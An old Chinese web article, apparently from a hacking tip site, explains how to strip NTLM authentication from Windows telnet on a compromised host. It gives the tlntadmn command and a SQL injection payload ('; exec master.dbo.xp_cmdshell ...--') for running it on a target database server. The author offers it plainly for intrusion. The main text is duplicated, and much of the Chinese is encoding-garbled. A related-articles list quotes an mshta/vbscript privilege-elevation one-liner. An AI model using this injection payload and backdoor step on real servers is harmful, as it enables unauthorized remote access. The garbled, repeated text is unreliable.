一個(gè)小技巧 ntlm
更新時(shí)間:2006年09月07日 00:00:00 作者:
相信大家都對(duì)telnet比較熟悉吧。hacking的時(shí)候經(jīng)常用到的系統(tǒng)自帶shell尤其是注射的時(shí)候,但是最討厭的就是ntlm認(rèn)證了,以前大家去掉ntlm的方法一般有2種。
1 上傳ntml.exe 這種方法有很多缺點(diǎn),比如:對(duì)方有殺毒軟件,很多網(wǎng)段屏蔽了TFTP.
2 直接寫(xiě)入telnet的配置信息到文本中然后在用shell執(zhí)行。 這種辦法非常麻煩。
今天我給大家介紹我一直在使用的辦法,壓箱底的哦。
那就是直接運(yùn)行命令:tlntadmn config sec = -ntlm
注射的話可以直接運(yùn)行:;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--
運(yùn)行以后就去掉了該死的ntlm認(rèn)證:) 趕快去試試吧。
1 上傳ntml.exe 這種方法有很多缺點(diǎn),比如:對(duì)方有殺毒軟件,很多網(wǎng)段屏蔽了TFTP.
2 直接寫(xiě)入telnet的配置信息到文本中然后在用shell執(zhí)行。 這種辦法非常麻煩。
今天我給大家介紹我一直在使用的辦法,壓箱底的哦。
那就是直接運(yùn)行命令:tlntadmn config sec = -ntlm
注射的話可以直接運(yùn)行:;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--
運(yùn)行以后就去掉了該死的ntlm認(rèn)證:) 趕快去試試吧。
相關(guān)文章
批處理BAT加強(qiáng)函數(shù)代碼使用說(shuō)明
希望大家想了解BAT批處理的好好看看有所加強(qiáng),看到剛才發(fā)表的文章我也認(rèn)為BAT的重要性。這點(diǎn)大家都知道所以轉(zhuǎn)了一章好東東大家共同提高。也希望大家有好東東好思想大家來(lái)了解加強(qiáng)。2008-08-08
windows設(shè)置開(kāi)機(jī)自動(dòng)運(yùn)行批處理的方法
這篇文章介紹了windows設(shè)置開(kāi)機(jī)自動(dòng)運(yùn)行批處理的方法,對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧2021-12-12
Cmd 啟動(dòng)命令解釋器 Cmd.exe 的新實(shí)例
Cmd 啟動(dòng)命令解釋器 Cmd.exe 的新實(shí)例...2007-09-09
Ghost安裝Win7/XP后自動(dòng)恢復(fù)IP的批處理代碼(ip備份恢復(fù))
這篇文章主要介紹了Ghost安裝Win7/XP后自動(dòng)恢復(fù)IP的批處理代碼,其實(shí)就是在ghost系統(tǒng)之前將ip信息備份一下,等做完系統(tǒng)以后再恢復(fù)一下就可以了2016-02-02
copy 將一個(gè)或多個(gè)文件從一個(gè)位置復(fù)制到其他位置
copy 將一個(gè)或多個(gè)文件從一個(gè)位置復(fù)制到其他位置...2007-09-09
%1?mshta?vbscript之管理員權(quán)限運(yùn)行bat的解讀
最近發(fā)現(xiàn)很多朋友咨詢%1?mshta?vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c?"^&chr(34)^&"%~0"^&chr(34)^&"?::","%cd%","runas",1)(window.close)&&exit的意思,這里就為大家簡(jiǎn)單介紹一下2023-05-05

